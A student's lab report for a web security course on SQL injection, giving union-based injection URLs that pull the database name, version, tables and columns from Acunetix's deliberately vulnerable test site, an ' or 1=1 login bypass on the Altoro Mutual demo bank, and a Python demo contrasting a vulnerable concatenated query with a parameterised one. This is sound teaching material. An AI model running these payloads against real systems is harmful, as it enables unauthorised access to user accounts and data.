DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
Student Name: Kushagra UID: 20BCS1622
Branch: CSE Section/Group: 20BCS_WM_605-B
Semester: 5th Subject Code: 20-CSP-338
Subject Name: Web and Mobile Security
Sr. No.   Program   Date   Evaluation (LW 12 / VV 10 / FW 8 / Total 30)   Sign
1. To analyze HTTP Traffic.
2. To test HTML and XSS injection.
3. Working of CSRF Vulnerability.
4. Working of SQL Injection Attack.
Experiment Number: “04”
Student Name: KUSHAGRA UID: 20BCS1622
Branch: CSE Section/Group: 20BCS_WM_605-B
Semester: 5th Subject: Web and Mobile Security Lab
1. Aim/Overview of the practical: Working of SQL Injection Attack.
2. Objective: To understand SQL Injection and test whether a site is vulnerable to it.
3. Tools Used:
• Acunetix acuart page.
• Altoro Mutual Bank Login page.
4. Steps Involved:
1. First of all, visit the page testphp.vulnweb.com.
2. Now use the following URLs and observe the output:
• Go to http://testphp.vulnweb.com/listproducts.php?cat=1
• Put a random number (a non-existent category id, here -1) in place of the category and append an order by clause to check the number of columns in the result tuple: http://testphp.vulnweb.com/listproducts.php?cat=-1 order by ...
• Information gathering:
• To check the database name, go to http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,database()--
• To check the database version, go to http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,version()--
• Information to be fetched:
• Table names: http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
• Column names: http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273
3. Now, for direct access to a user's account, we implement SQL Direct Access Injection. In order to perform that, visit the Altoro Mutual Bank login page.
4. Now, in place of the user id put ' or 1=1--+ and choose any password of your choice.
5. "Boom", we get direct entry into the user's account, as verified on the server side.
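The login bypass in steps 3 to 5, as an added example that is not part of the original report: a constructed in-memory SQLite user table is queried first by string concatenation (the flaw the tautology exploits, so the first row comes back regardless of the password) and then with a parameterised query, which treats the same input as plain data and returns nothing. The table, its two users and the function names are assumptions for this demo.

```python
import sqlite3

# Constructed demo data standing in for a bank's user table (assumption, not Altoro's schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("jsmith", "demo1234"), ("admin", "secret!")])
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String concatenation: the user input becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# The payload from step 4 with the URL-encoded '+' decoded to a space:
# the quote closes the literal, 1=1 is always true, and "--" comments out the password check.
TAUTOLOGY = "' or 1=1-- "

def demo():
    conn = make_db()
    return {
        "vuln_real": login_vulnerable(conn, "jsmith", "demo1234"),       # "jsmith"
        "vuln_wrong_pw": login_vulnerable(conn, "jsmith", "nope"),       # None
        "vuln_injected": login_vulnerable(conn, TAUTOLOGY, "anything"),  # "jsmith": bypassed
        "safe_real": login_safe(conn, "jsmith", "demo1234"),             # "jsmith"
        "safe_injected": login_safe(conn, TAUTOLOGY, "anything"),        # None: no such user
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```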
OUTPUT:
ACUNETIX ACUART:
ALTORO MUTUAL:
Learning Outcomes:
• We learnt how to identify SQL Injection vulnerabilities in a site and its server.
• We learnt how a SQL Injection attack works.